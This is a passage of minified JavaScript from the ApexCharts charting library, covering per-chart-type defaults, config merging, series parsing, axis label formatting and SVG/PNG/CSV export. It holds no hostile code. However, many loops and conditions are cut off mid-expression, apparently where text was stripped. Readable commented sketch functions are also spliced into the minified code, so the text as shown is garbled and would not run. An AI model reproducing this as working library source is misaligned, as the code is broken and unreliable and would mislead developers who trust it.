a.buildCustomTooltipHTML({color:i,seriesName:t,ylabel:r,start:o,end:s})}(e)}},xaxis:{tickPlacement:"between",tooltip:{enabled:!1},crosshairs:{stroke:{width:0}}}}}},{key:"area",value:function(){return{stroke:{width:4},fill:{type:"gradient",gradient:{inverseColors:!1,shade:"light",type:"vertical",opacityFrom:.65,opacityTo:.5,stops:[0,100,100]}},markers:{size:0,hover:{sizeOffset:6}},tooltip:{followCursor:!1}}}},{key:"brush",value:function(e){return 
k.extend(e,{chart:{toolbar:{autoSelected:"selection",show:!1},zoom:{enabled:!1}},dataLabels:{enabled:!1},stroke:{width:1},tooltip:{enabled:!1},xaxis:{tooltip:{enabled:!1}}})}},{key:"stacked100",value:function(e){e.dataLabels=e.dataLabels||{},e.dataLabels.formatter=e.dataLabels.formatter||void 0;var a=e.dataLabels.formatter;return e.yaxis.forEach((function(a,n){e.yaxis[n].min=0,e.yaxis[n].max=100})),"bar"===e.chart.type&&(e.dataLabels.formatter=a||function(e){return"number"==typeof e&&e?e.toFixed(0)+"%":e}),e}},{key:"convertCatToNumeric",value:function(e){return e.xaxis.convertedCatToNumeric=!0,e}},{key:"convertCatToNumericXaxis",value:function(e,a,n){e.xaxis.type="numeric",e.xaxis.labels=e.xaxis.labels||{},e.xaxis.labels.formatter=e.xaxis.labels.formatter||function(e){return k.isNumber(e)?Math.floor(e):e};var i=e.xaxis.labels.formatter,t=e.xaxis.categories&&e.xaxis.categories.length?e.xaxis.categories:e.labels;return n&&n.length&&(t=n.map((function(e){return Array.isArray(e)?e:String(e)}))),t&&t.length&&(e.xaxis.labels.formatter=function(e){return k.isNumber(e)?i(t[Math.floor(e)-1]):i(e)}),e.xaxis.categories=[],e.labels=[],e.xaxis.tickAmount=e.xaxis.tickAmount||"dataPoints",e}},{key:"bubble",value:function(){return{dataLabels:{style:{colors:["#fff"]}},tooltip:{shared:!1,intersect:!0},xaxis:{crosshairs:{width:0}},fill:{type:"solid",gradient:{shade:"light",inverse:!0,shadeIntensity:.55,opacityFrom:.4,opacityTo:.8}}}}},{key:"scatter",value:function(){return{dataLabels:{enabled:!1},tooltip:{shared:!1,intersect:!0},markers:{size:6,strokeWidth:1,hover:{sizeOffset:2}}}}},{key:"heatmap",value:function(){return{chart:{stacked:!1},fill:{opacity:1},dataLabels:{style:{colors:["#fff"]}},stroke:{colors:["#fff"]},tooltip:{followCursor:!0,marker:{show:!1},x:{show:!1}},legend:{position:"top",markers:{shape:"square",size:10,offsetY:2}},grid:{padding:{right:20}}}}},{key:"treemap",value:function(){return{chart:{zoom:{enabled:!1}},dataLabels:{style:{fontSize:14,fontWeight:600,colors:["#fff"]}},stroke:{show:!0,width:2,colors:["#fff"]},legend:{show:!1},fill:{gradient:{stops:[0,100]}},tooltip:{followCursor:!0,x:{show:!1}},grid:{padding:{left:0,right:0}},xaxis:{crosshairs:{show:!1},tooltip:{enabled:!1}}}}},{key:"pie",value:function(){return{chart:{toolbar:{show:!1}},plotOptions:{pie:{donut:{labels:{show:!1}}}},dataLabels:{formatter:function(e){return e.toFixed(1)+"%"},style:{colors:["#fff"]},background:{enabled:!1},dropShadow:{enabled:!0}},stroke:{colors:["#fff"]},fill:{opacity:1,gradient:{shade:"light",stops:[0,100]}},tooltip:{theme:"dark",fillSeriesColor:!0},legend:{position:"right"}}}},{key:"donut",value:function(){return{chart:{toolbar:{show:!1}},dataLabels:{formatter:function(e){return e.toFixed(1)+"%"},style:{colors:["#fff"]},background:{enabled:!1},dropShadow:{enabled:!0}},stroke:{colors:["#fff"]},fill:{opacity:1,gradient:{shade:"light",shadeIntensity:.35,stops:[80,100],opacityFrom:1,opacityTo:1}},tooltip:{theme:"dark",fillSeriesColor:!0},legend:{position:"right"}}}},{key:"polarArea",value:function(){return this.opts.yaxis[0].tickAmount=this.opts.yaxis[0].tickAmount?this.opts.yaxis[0].tickAmount:6,{chart:{toolbar:{show:!1}},dataLabels:{formatter:function(e){return e.toFixed(1)+"%"},enabled:!1},stroke:{show:!0,width:2},fill:{opacity:.7},tooltip:{theme:"dark",fillSeriesColor:!0},legend:{position:"right"}}}},{key:"radar",value:function(){return 
this.opts.yaxis[0].labels.offsetY=this.opts.yaxis[0].labels.offsetY?this.opts.yaxis[0].labels.offsetY:6,{dataLabels:{enabled:!1,style:{fontSize:"11px"}},stroke:{width:2},markers:{size:3,strokeWidth:1,strokeOpacity:1},fill:{opacity:.2},tooltip:{shared:!1,intersect:!0,followCursor:!0},grid:{show:!1},xaxis:{labels:{formatter:function(e){return e},style:{colors:["#a8a8a8"],fontSize:"11px"}},tooltip:{enabled:!1},crosshairs:{show:!1}}}}},{key:"radialBar",value:function(){return{chart:{animations:{dynamicAnimation:{enabled:!0,speed:800}},toolbar:{show:!1}},fill:{gradient:{shade:"dark",shadeIntensity:.4,inverseColors:!1,type:"diagonal2",opacityFrom:1,opacityTo:1,stops:[70,98,100]}},legend:{show:!1,position:"right"},tooltip:{enabled:!1,fillSeriesColor:!0}}}},{key:"_getBoxTooltip",value:function(e,a,n,i,t){var r=e.globals.seriesCandleO[a][n],o=e.globals.seriesCandleH[a][n],s=e.globals.seriesCandleM[a][n],l=e.globals.seriesCandleL[a][n],u=e.globals.seriesCandleC[a][n];return e.config.series[a].type&&e.config.series[a].type!==t?'
<div class="apexcharts-custom-tooltip">\n          '.concat(e.config.series[a].name?e.config.series[a].name:"series-"+(a+1),": <strong>").concat(e.globals.series[a][n],"</strong>\n        </div>"):'<div class="apexcharts-tooltip-box apexcharts-tooltip-'.concat(e.config.chart.type,'">')+"<div>".concat(i[0],': <span class="value">')+r+"</span></div>"+"<div>".concat(i[1],': <span class="value">')+o+"</span></div>"+(s?"<div>".concat(i[2],': <span class="value">')+s+"</span></div>":"")+"<div>".concat(i[3],': <span class="value">')+l+"</span></div>"+"<div>".concat(i[4],': <span class="value">')+u+"</span></div>
"}}]),e}(),F=function(){function e(a){s(this,e),this.opts=a}return u(e,[{key:"init",value:function(e){var a=e.responsiveOverride,n=this.opts,i=new B,t=new V(n);this.chartType=n.chart.type,"histogram"===this.chartType&&(n.chart.type="bar",n=k.extend({plotOptions:{bar:{columnWidth:"99.99%"}}},n)),n=this.extendYAxis(n),n=this.extendAnnotations(n);var r=i.init(),s={};if(n&&"object"===o(n)){var l={};l=-1!==["line","area","bar","candlestick","boxPlot","rangeBar","histogram","bubble","scatter","heatmap","treemap","pie","polarArea","donut","radar","radialBar"].indexOf(n.chart.type)?t[n.chart.type]():t.line(),n.chart.brush&&n.chart.brush.enabled&&(l=t.brush(l)),n.chart.stacked&&"100%"===n.chart.stackType&&(n=t.stacked100(n)),this.checkForDarkTheme(window.Apex),this.checkForDarkTheme(n),n.xaxis=n.xaxis||window.Apex.xaxis||{},a||(n.xaxis.convertedCatToNumeric=!1),((n=this.checkForCatToNumericXAxis(this.chartType,l,n)).chart.sparkline&&n.chart.sparkline.enabled||window.Apex.chart&&window.Apex.chart.sparkline&&window.Apex.chart.sparkline.enabled)&&(l=t.sparkline(l)),s=k.extend(r,l)}var u=k.extend(s,window.Apex);return r=k.extend(u,n),this.handleUserInputErrors(r)}},{key:"checkForCatToNumericXAxis",value:function(e,a,n){var i=new V(n),t=("bar"===e||"boxPlot"===e)&&n.plotOptions&&n.plotOptions.bar&&n.plotOptions.bar.horizontal,r="pie"===e||"polarArea"===e||"donut"===e||"radar"===e||"radialBar"===e||"heatmap"===e,o="datetime"!==n.xaxis.type&&"numeric"!==n.xaxis.type,s=n.xaxis.tickPlacement?n.xaxis.tickPlacement:a.xaxis&&a.xaxis.tickPlacement;return t||r||!o||"between"===s||(n=i.convertCatToNumeric(n)),n}},{key:"extendYAxis",value:function(e,a){var n=new B;(void 0===e.yaxis||!e.yaxis||Array.isArray(e.yaxis)&&0===e.yaxis.length)&&(e.yaxis={}),e.yaxis.constructor!==Array&&window.Apex.yaxis&&window.Apex.yaxis.constructor!==Array&&(e.yaxis=k.extend(e.yaxis,window.Apex.yaxis)),e.yaxis.constructor!==Array?e.yaxis=[k.extend(n.yAxis,e.yaxis)]:e.yaxis=k.extendArray(e.yaxis,n.yAxis);var i=!1;e.yaxis.forEach((function(e){e.logarithmic&&(i=!0)}));var t=e.series;return a&&!t&&(t=a.config.series),i&&t.length!==e.yaxis.length&&t.length&&(e.yaxis=t.map((function(a,i){if(a.name||(t[i].name="series-".concat(i+1)),e.yaxis[i])return e.yaxis[i].seriesName=t[i].name,e.yaxis[i];var r=k.extend(n.yAxis,e.yaxis[0]);return r.show=!1,r}))),i&&t.length>1&&t.length!==e.yaxis.length&&console.warn("A multi-series logarithmic chart should have equal number of series and y-axes. 
Please make sure to equalize both."),e}},{key:"extendAnnotations",value:function(e){return void 0===e.annotations&&(e.annotations={},e.annotations.yaxis=[],e.annotations.xaxis=[],e.annotations.points=[]),e=this.extendYAxisAnnotations(e),e=this.extendXAxisAnnotations(e),this.extendPointAnnotations(e)}},{key:"extendYAxisAnnotations",value:function(e){var a=new B;return e.annotations.yaxis=k.extendArray(void 0!==e.annotations.yaxis?e.annotations.yaxis:[],a.yAxisAnnotation),e}},{key:"extendXAxisAnnotations",value:function(e){var a=new B;return e.annotations.xaxis=k.extendArray(void 0!==e.annotations.xaxis?e.annotations.xaxis:[],a.xAxisAnnotation),e}},{key:"extendPointAnnotations",value:function(e){var a=new B;return e.annotations.points=k.extendArray(void 0!==e.annotations.points?e.annotations.points:[],a.pointAnnotation),e}},{key:"checkForDarkTheme",value:function(e){e.theme&&"dark"===e.theme.mode&&(e.tooltip||(e.tooltip={}),"light"!==e.tooltip.theme&&(e.tooltip.theme="dark"),e.chart.foreColor||(e.chart.foreColor="#f6f7f8"),e.chart.background||(e.chart.background="#424242"),e.theme.palette||(e.theme.palette="palette4"))}},{key:"handleUserInputErrors",value:function(e){var a=e;if(a.tooltip.shared&&a.tooltip.intersect)throw new Error("tooltip.shared cannot be enabled when tooltip.intersect is true. Turn off any other option by setting it to false.");if("bar"===a.chart.type&&a.plotOptions.bar.horizontal){if(a.yaxis.length>1)throw new Error("Multiple Y Axis for bars are not supported. Switch to column chart by setting plotOptions.bar.horizontal=false");a.yaxis[0].reversed&&(a.yaxis[0].opposite=!0),a.xaxis.tooltip.enabled=!1,a.yaxis[0].tooltip.enabled=!1,a.chart.zoom.enabled=!1}return"bar"!==a.chart.type&&"rangeBar"!==a.chart.type||a.tooltip.shared&&"barWidth"===a.xaxis.crosshairs.width&&a.series.length>1&&(a.xaxis.crosshairs.width="tickWidth"),"candlestick"!==a.chart.type&&"boxPlot"!==a.chart.type||a.yaxis[0].reversed&&(console.warn("Reversed y-axis in ".concat(a.chart.type," chart is not supported.")),a.yaxis[0].reversed=!1),a}}]),e}(),G=function(){function e(){s(this,e)}return 
u(e,[{key:"initGlobalVars",value:function(e){e.series=[],e.seriesCandleO=[],e.seriesCandleH=[],e.seriesCandleM=[],e.seriesCandleL=[],e.seriesCandleC=[],e.seriesRangeStart=[],e.seriesRangeEnd=[],e.seriesRangeBar=[],e.seriesPercent=[],e.seriesGoals=[],e.seriesX=[],e.seriesZ=[],e.seriesNames=[],e.seriesTotals=[],e.seriesLog=[],e.seriesColors=[],e.stackedSeriesTotals=[],e.seriesXvalues=[],e.seriesYvalues=[],e.labels=[],e.hasGroups=!1,e.groups=[],e.categoryLabels=[],e.timescaleLabels=[],e.noLabelsProvided=!1,e.resizeTimer=null,e.selectionResizeTimer=null,e.delayedElements=[],e.pointsArray=[],e.dataLabelsRects=[],e.isXNumeric=!1,e.xaxisLabelsCount=0,e.skipLastTimelinelabel=!1,e.skipFirstTimelinelabel=!1,e.isDataXYZ=!1,e.isMultiLineX=!1,e.isMultipleYAxis=!1,e.maxY=-Number.MAX_VALUE,e.minY=Number.MIN_VALUE,e.minYArr=[],e.maxYArr=[],e.maxX=-Number.MAX_VALUE,e.minX=Number.MAX_VALUE,e.initialMaxX=-Number.MAX_VALUE,e.initialMinX=Number.MAX_VALUE,e.maxDate=0,e.minDate=Number.MAX_VALUE,e.minZ=Number.MAX_VALUE,e.maxZ=-Number.MAX_VALUE,e.minXDiff=Number.MAX_VALUE,e.yAxisScale=[],e.xAxisScale=null,e.xAxisTicksPositions=[],e.yLabelsCoords=[],e.yTitleCoords=[],e.barPadForNumericAxis=0,e.padHorizontal=0,e.xRange=0,e.yRange=[],e.zRange=0,e.dataPoints=0,e.xTickAmount=0}},{key:"globalVars",value:function(e){return{chartID:null,cuid:null,events:{beforeMount:[],mounted:[],updated:[],clicked:[],selection:[],dataPointSelection:[],zoomed:[],scrolled:[]},colors:[],clientX:null,clientY:null,fill:{colors:[]},stroke:{colors:[]},dataLabels:{style:{colors:[]}},radarPolygons:{fill:{colors:[]}},markers:{colors:[],size:e.markers.size,largestSize:0},animationEnded:!1,isTouchDevice:"ontouchstart"in window||navigator.msMaxTouchPoints,isDirty:!1,isExecCalled:!1,initialConfig:null,initialSeries:[],lastXAxis:[],lastYAxis:[],columnSeries:null,labels:[],timescaleLabels:[],noLabelsProvided:!1,allSeriesCollapsed:!1,collapsedSeries:[],collapsedSeriesIndices:[],ancillaryCollapsedSeries:[],ancillaryCollapsedSeriesIndices:[],risingSeries:[],dataFormatXNumeric:!1,capturedSeriesIndex:-1,capturedDataPointIndex:-1,selectedDataPoints:[],goldenPadding:35,invalidLogScale:!1,ignoreYAxisIndexes:[],yAxisSameScaleIndices:[],maxValsInArrayIndex:0,radialSize:0,selection:void 0,zoomEnabled:"zoom"===e.chart.toolbar.autoSelected&&e.chart.toolbar.tools.zoom&&e.chart.zoom.enabled,panEnabled:"pan"===e.chart.toolbar.autoSelected&&e.chart.toolbar.tools.pan,selectionEnabled:"selection"===e.chart.toolbar.autoSelected&&e.chart.toolbar.tools.selection,yaxis:null,mousedown:!1,lastClientPosition:{},visibleXRange:void 0,yValueDecimal:0,total:0,SVGNS:"http://www.w3.org/2000/svg",svgWidth:0,svgHeight:0,noData:!1,locale:{},dom:{},memory:{methodsToExec:[]},shouldAnimate:!0,skipLastTimelinelabel:!1,skipFirstTimelinelabel:!1,delayedElements:[],axisCharts:!0,isDataXYZ:!1,resized:!1,resizeTimer:null,comboCharts:!1,dataChanged:!1,previousPaths:[],allSeriesHasEqualX:!0,pointsArray:[],dataLabelsRects:[],lastDrawnDataLabelsIndexes:[],hasNullValues:!1,easing:null,zoomed:!1,gridWidth:0,gridHeight:0,rotateXLabels:!1,defaultLabels:!1,xLabelFormatter:void 0,yLabelFormatters:[],xaxisTooltipFormatter:void 0,ttKeyFormatter:void 0,ttVal:void 0,ttZFormatter:void 0,LINE_HEIGHT_RATIO:1.618,xAxisLabelsHeight:0,xAxisGroupLabelsHeight:0,xAxisLabelsWidth:0,yAxisLabelsWidth:0,scaleX:1,scaleY:1,translateX:0,translateY:0,translateYAxisX:[],yAxisWidths:[],translateXAxisY:0,translateXAxisX:0,tooltip:null}}},{key:"init",value:function(e){var a=this.globalVars(e);return 
this.initGlobalVars(a),a.initialConfig=k.extend({},e),a.initialSeries=k.clone(e.series),a.lastXAxis=k.clone(a.initialConfig.xaxis),a.lastYAxis=k.clone(a.initialConfig.yaxis),a}}]),e}(),I=function(){function e(a){s(this,e),this.opts=a}return u(e,[{key:"init",value:function(){var e=new F(this.opts).init({responsiveOverride:!1});return{config:e,globals:(new G).init(e)}}}]),e}(),Z=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.twoDSeries=[],this.threeDSeries=[],this.twoDSeriesX=[],this.seriesGoals=[],this.coreUtils=new A(this.ctx)}return u(e,[{key:"isMultiFormat",value:function(){return this.isFormatXY()||this.isFormat2DArray()}},{key:"isFormatXY",value:function(){var e=this.w.config.series.slice(),a=new K(this.ctx);if(this.activeSeriesIndex=a.getActiveConfigSeriesIndex(),void 0!==e[this.activeSeriesIndex].data&&e[this.activeSeriesIndex].data.length>0&&null!==e[this.activeSeriesIndex].data[0]&&void 0!==e[this.activeSeriesIndex].data[0].x&&null!==e[this.activeSeriesIndex].data[0])return!0}},{key:"isFormat2DArray",value:function(){var e=this.w.config.series.slice(),a=new K(this.ctx);if(this.activeSeriesIndex=a.getActiveConfigSeriesIndex(),void 0!==e[this.activeSeriesIndex].data&&e[this.activeSeriesIndex].data.length>0&&void 0!==e[this.activeSeriesIndex].data[0]&&null!==e[this.activeSeriesIndex].data[0]&&e[this.activeSeriesIndex].data[0].constructor===Array)return!0}},{key:"handleFormat2DArray",value:function(e,a){for(var n=this.w.config,i=this.w.globals,t="boxPlot"===n.chart.type||"boxPlot"===n.series[a].type,r=0;r=5?this.twoDSeries.push(k.parseNumber(e[a].data[r][4])):this.twoDSeries.push(k.parseNumber(e[a].data[r][1])),i.dataFormatXNumeric=!0),"datetime"===n.xaxis.type){var o=new Date(e[a].data[r][0]);o=new Date(o).getTime(),this.twoDSeriesX.push(o)}else this.twoDSeriesX.push(e[a].data[r][0]);for(var s=0;s-1&&(r=this.activeSeriesIndex);for(var o=0;o1&&void 0!==arguments[1]?arguments[1]:this.ctx,i=this.w.config,t=this.w.globals,r=new H(n),o=i.labels.length>0?i.labels.slice():i.xaxis.categories.slice();t.isRangeBar="rangeBar"===i.chart.type&&t.isBarHorizontal,t.hasGroups="category"===i.xaxis.type&&void 0!==i.xaxis.group&&void 0!==i.xaxis.group.groups&&i.xaxis.group.groups.length>0,t.hasGroups&&(t.groups=i.xaxis.group.groups);for(var s=function(){for(var e=0;e0&&(this.twoDSeriesX=o,t.seriesX.push(this.twoDSeriesX))),t.labels.push(this.twoDSeriesX);var u=e[l].data.map((function(e){return k.parseNumber(e)}));t.series.push(u)}t.seriesZ.push(this.threeDSeries),void 0!==e[l].name?t.seriesNames.push(e[l].name):t.seriesNames.push("series-"+parseInt(l+1,10)),void 0!==e[l].color?t.seriesColors.push(e[l].color):t.seriesColors.push(void 0)}return this.w}},{key:"parseDataNonAxisCharts",value:function(e){var a=this.w.globals,n=this.w.config;a.series=e.slice(),a.seriesNames=n.labels.slice();for(var i=0;i0?n.labels=a.xaxis.categories:a.labels.length>0?n.labels=a.labels.slice():this.fallbackToCategory?(n.labels=n.labels[0],n.seriesRangeBar.length&&(n.seriesRangeBar.map((function(e){e.forEach((function(e){n.labels.indexOf(e.x)<0&&e.x&&n.labels.push(e.x)}))})),n.labels=n.labels.filter((function(e,a,n){return n.indexOf(e)===a}))),a.xaxis.convertedCatToNumeric&&(new V(a).convertCatToNumericXaxis(a,this.ctx,n.seriesX[0]),this._generateExternalLabels(e))):this._generateExternalLabels(e)}},{key:"_generateExternalLabels",value:function(e){var a=this.w.globals,n=this.w.config,i=[];if(a.axisCharts){if(a.series.length>0)if(this.isFormatXY())for(var t=n.series.map((function(e,a){return 
e.data.filter((function(e,a,n){return n.findIndex((function(a){return a.x===e.x}))===a}))})),r=t.reduce((function(e,a,n,i){return i[e].length>a.length?e:n}),0),o=0;o0&&n<100?e.toFixed(1):e.toFixed(0)}return a.globals.isBarHorizontal&&a.globals.maxY-a.globals.minYArr<4?e.toFixed(1):e.toFixed(0)}return e},"function"==typeof a.config.tooltip.x.formatter?a.globals.ttKeyFormatter=a.config.tooltip.x.formatter:a.globals.ttKeyFormatter=a.globals.xLabelFormatter,"function"==typeof a.config.xaxis.tooltip.formatter&&(a.globals.xaxisTooltipFormatter=a.config.xaxis.tooltip.formatter),(Array.isArray(a.config.tooltip.y)||void 0!==a.config.tooltip.y.formatter)&&(a.globals.ttVal=a.config.tooltip.y),void 0!==a.config.tooltip.z.formatter&&(a.globals.ttZFormatter=a.config.tooltip.z.formatter),void 0!==a.config.legend.formatter&&(a.globals.legendFormatter=a.config.legend.formatter),a.config.yaxis.forEach((function(n,i){void 0!==n.labels.formatter?a.globals.yLabelFormatters[i]=n.labels.formatter:a.globals.yLabelFormatters[i]=function(t){return a.globals.xyCharts?Array.isArray(t)?t.map((function(a){return e.defaultYFormatter(a,n,i)})):e.defaultYFormatter(t,n,i):t}})),a.globals}},{key:"heatmapLabelFormatters",value:function(){var e=this.w;if("heatmap"===e.config.chart.type){e.globals.yAxisScale[0].result=e.globals.seriesNames.slice();var a=e.globals.seriesNames.reduce((function(e,a){return e.length>a.length?e:a}),0);e.globals.yAxisScale[0].niceMax=a,e.globals.yAxisScale[0].niceMin=a}}}]),e}(),W=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"getLabel",value:function(e,a,n,i){var t=arguments.length>4&&void 0!==arguments[4]?arguments[4]:[],r=arguments.length>5&&void 0!==arguments[5]?arguments[5]:"12px",o=!(arguments.length>6&&void 0!==arguments[6])||arguments[6],s=this.w,l=void 0===e[i]?"":e[i],u=l,c=s.globals.xLabelFormatter,d=s.config.xaxis.labels.formatter,h=!1,p=new J(this.ctx),m=l;o&&(u=p.xLabelFormat(c,l,m,{i:i,dateFormatter:new H(this.ctx).formatDate,w:s}),void 0!==d&&(u=d(l,e[i],{i:i,dateFormatter:new H(this.ctx).formatDate,w:s})));var f=function(e){var n=null;return a.forEach((function(e){"month"===e.unit?n="year":"day"===e.unit?n="month":"hour"===e.unit?n="day":"minute"===e.unit&&(n="hour")})),n===e};a.length>0?(h=f(a[i].unit),n=a[i].position,u=a[i].value):"datetime"===s.config.xaxis.type&&void 0===d&&(u=""),void 0===u&&(u=""),u=Array.isArray(u)?u:u.toString();var v=new S(this.ctx),g={};g=s.globals.rotateXLabels&&o?v.getTextRects(u,parseInt(r,10),null,"rotate(".concat(s.config.xaxis.labels.rotate," 0 0)"),!1):v.getTextRects(u,parseInt(r,10));var b=!s.config.xaxis.labels.showDuplicates&&this.ctx.timeScale;return!Array.isArray(u)&&(0===u.indexOf("NaN")||0===u.toLowerCase().indexOf("invalid")||u.toLowerCase().indexOf("infinity")>=0||t.indexOf(u)>=0&&b)&&(u=""),{x:n,text:u,textRect:g,isBold:h}}},{key:"checkLabelBasedOnTickamount",value:function(e,a,n){var i=this.w,t=i.config.xaxis.tickAmount;return"dataPoints"===t&&(t=Math.round(i.globals.gridWidth/120)),t>n||e%Math.round(n/(t+1))==0||(a.text=""),a}},{key:"checkForOverflowingLabels",value:function(e,a,n,i,t){var r=this.w;if(0===e&&r.globals.skipFirstTimelinelabel&&(a.text=""),e===n-1&&r.globals.skipLastTimelinelabel&&(a.text=""),r.config.xaxis.labels.hideOverlappingLabels&&i.length>0){var o=t[t.length-1];a.x0){!0===s.config.yaxis[t].opposite&&(e+=i.width);for(var c=a;c>=0;c--){var d=u+a/10+s.config.yaxis[t].labels.offsetY-1;s.globals.isBarHorizontal&&(d=r*c),"heatmap"===s.config.chart.type&&(d+=r/2);var 
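/* Illustrative sketch of the series-format detection performed by isFormatXY and
   isFormat2DArray above: ApexCharts accepts plain value arrays, [x, y] pairs, or
   {x, y} objects, and branches its parsing accordingly. Names are illustrative. */
function detectSeriesFormat(data) {
  if (!data || !data.length || data[0] == null) return 'empty';
  if (Array.isArray(data[0])) return 'pairs'; // e.g. [[1609459200000, 10], ...]
  if (typeof data[0] === 'object' && 'x' in data[0]) return 'xy'; // [{x, y}, ...]
  return 'values'; // e.g. [10, 12, 15]
}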
h=l.drawLine(e+n.offsetX-i.width+i.offsetX,d+i.offsetY,e+n.offsetX+i.offsetX,d+i.offsetY,i.color);o.add(h),u+=r}}}}]),e}(),U=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"scaleSvgNode",value:function(e,a){var n=parseFloat(e.getAttributeNS(null,"width")),i=parseFloat(e.getAttributeNS(null,"height"));e.setAttributeNS(null,"width",n*a),e.setAttributeNS(null,"height",i*a),e.setAttributeNS(null,"viewBox","0 0 "+n+" "+i)}},{key:"fixSvgStringForIe11",value:function(e){if(!k.isIE11())return e.replace(/ /g," ");var a=0,n=e.replace(/xmlns="http:\/\/www.w3.org\/2000\/svg"/g,(function(e){return 2===++a?'xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:svgjs="http://svgjs.dev"':e}));return(n=n.replace(/xmlns:NS\d+=""/g,"")).replace(/NS\d+:(\w+:\w+=")/g,"$1")}},{key:"getSvgString",value:function(e){var a=this.w.globals.dom.Paper.svg();if(1!==e){var n=this.w.globals.dom.Paper.node.cloneNode(!0);this.scaleSvgNode(n,e),a=(new XMLSerializer).serializeToString(n)}return this.fixSvgStringForIe11(a)}},{key:"cleanup",value:function(){var e=this.w,a=e.globals.dom.baseEl.getElementsByClassName("apexcharts-xcrosshairs"),n=e.globals.dom.baseEl.getElementsByClassName("apexcharts-ycrosshairs"),i=e.globals.dom.baseEl.querySelectorAll(".apexcharts-zoom-rect, .apexcharts-selection-rect");Array.prototype.forEach.call(i,(function(e){e.setAttribute("width",0)})),a&&a[0]&&(a[0].setAttribute("x",-500),a[0].setAttribute("x1",-500),a[0].setAttribute("x2",-500)),n&&n[0]&&(n[0].setAttribute("y",-100),n[0].setAttribute("y1",-100),n[0].setAttribute("y2",-100))}},{key:"svgUrl",value:function(){this.cleanup();var e=this.getSvgString(),a=new Blob([e],{type:"image/svg+xml;charset=utf-8"});return URL.createObjectURL(a)}},{key:"dataURI",value:function(e){var a=this;return new Promise((function(n){var i=a.w,t=e?e.scale||e.width/i.globals.svgWidth:1;a.cleanup();var r=document.createElement("canvas");r.width=i.globals.svgWidth*t,r.height=parseInt(i.globals.dom.elWrap.style.height,10)*t;var o="transparent"===i.config.chart.background?"#fff":i.config.chart.background,s=r.getContext("2d");s.fillStyle=o,s.fillRect(0,0,r.width*t,r.height*t);var l=a.getSvgString(t);if(window.canvg&&k.isIE11()){var u=window.canvg.Canvg.fromString(s,l,{ignoreClear:!0,ignoreDimensions:!0});u.start();var c=r.msToBlob();u.stop(),n({blob:c})}else{var d="data:image/svg+xml,"+encodeURIComponent(l),h=new Image;h.crossOrigin="anonymous",h.onload=function(){if(s.drawImage(h,0,0),r.msToBlob){var e=r.msToBlob();n({blob:e})}else{var a=r.toDataURL("image/png");n({imgURI:a})}},h.src=d}}))}},{key:"exportToSVG",value:function(){this.triggerDownload(this.svgUrl(),this.w.config.chart.toolbar.export.svg.filename,".svg")}},{key:"exportToPng",value:function(){var e=this;this.dataURI().then((function(a){var n=a.imgURI,i=a.blob;i?navigator.msSaveOrOpenBlob(i,e.w.globals.chartID+".png"):e.triggerDownload(n,e.w.config.chart.toolbar.export.png.filename,".png")}))}},{key:"exportToCSV",value:function(e){var a=this,n=e.series,i=e.columnDelimiter,t=e.lineDelimiter,r=void 0===t?"\n":t,o=this.w,s=[],l=[],u="",c=new Z(this.ctx),d=new W(this.ctx),h=function(e){var n="";if(o.globals.axisCharts){if("category"===o.config.xaxis.type||o.config.xaxis.convertedCatToNumeric)if(o.globals.isBarHorizontal){var t=o.globals.yLabelFormatters[0],r=new K(a.ctx).getActiveConfigSeriesIndex();n=t(o.globals.labels[e],{seriesIndex:r,dataPointIndex:e,w:o})}else 
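/* Illustrative sketch of the export scaling done by scaleSvgNode above: the
   rendered width/height are multiplied by the export scale while viewBox keeps
   the original coordinate system, so the raster comes out larger but undistorted. */
function scaleSvgForExport(svg, scale) {
  var w = parseFloat(svg.getAttribute('width'));
  var h = parseFloat(svg.getAttribute('height'));
  svg.setAttribute('width', w * scale);
  svg.setAttribute('height', h * scale);
  svg.setAttribute('viewBox', '0 0 ' + w + ' ' + h);
}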
n=d.getLabel(o.globals.labels,o.globals.timescaleLabels,0,e).text;"datetime"===o.config.xaxis.type&&(o.config.xaxis.categories.length?n=o.config.xaxis.categories[e]:o.config.labels.length&&(n=o.config.labels[e]))}else n=o.config.labels[e];return Array.isArray(n)&&(n=n.join(" ")),k.isNumber(n)?n:n.split(i).join("")};s.push(o.config.chart.toolbar.export.csv.headerCategory),n.map((function(e,a){var n=e.name?e.name:"series-".concat(a);o.globals.axisCharts&&s.push(n.split(i).join("")?n.split(i).join(""):"series-".concat(a))})),o.globals.axisCharts||(s.push(o.config.chart.toolbar.export.csv.headerValue),l.push(s.join(i))),n.map((function(e,a){o.globals.axisCharts?function(e,a){if(s.length&&0===a&&l.push(s.join(i)),e.data&&e.data.length)for(var t=0;t=10?o.config.chart.toolbar.export.csv.dateFormatter(r):k.isNumber(r)?r:r.split(i).join("")));for(var u=0;u0&&!n.globals.isBarHorizontal&&(this.xaxisLabels=n.globals.timescaleLabels.slice()),n.config.xaxis.overwriteCategories&&(this.xaxisLabels=n.config.xaxis.overwriteCategories),this.drawnLabels=[],this.drawnLabelsRects=[],"top"===n.config.xaxis.position?this.offY=0:this.offY=n.globals.gridHeight+1,this.offY=this.offY+n.config.xaxis.axisBorder.offsetY,this.isCategoryBarHorizontal="bar"===n.config.chart.type&&n.config.plotOptions.bar.horizontal,this.xaxisFontSize=n.config.xaxis.labels.style.fontSize,this.xaxisFontFamily=n.config.xaxis.labels.style.fontFamily,this.xaxisForeColors=n.config.xaxis.labels.style.colors,this.xaxisBorderWidth=n.config.xaxis.axisBorder.width,this.isCategoryBarHorizontal&&(this.xaxisBorderWidth=n.config.yaxis[0].axisBorder.width.toString()),this.xaxisBorderWidth.indexOf("%")>-1?this.xaxisBorderWidth=n.globals.gridWidth*parseInt(this.xaxisBorderWidth,10)/100:this.xaxisBorderWidth=parseInt(this.xaxisBorderWidth,10),this.xaxisBorderHeight=n.config.xaxis.axisBorder.height,this.yaxis=n.config.yaxis[0]}return u(e,[{key:"drawXaxis",value:function(){var e=this.w,a=new S(this.ctx),n=a.group({class:"apexcharts-xaxis",transform:"translate(".concat(e.config.xaxis.offsetX,", ").concat(e.config.xaxis.offsetY,")")}),i=a.group({class:"apexcharts-xaxis-texts-g",transform:"translate(".concat(e.globals.translateXAxisX,", ").concat(e.globals.translateXAxisY,")")});n.add(i);for(var t=[],r=0;r6&&void 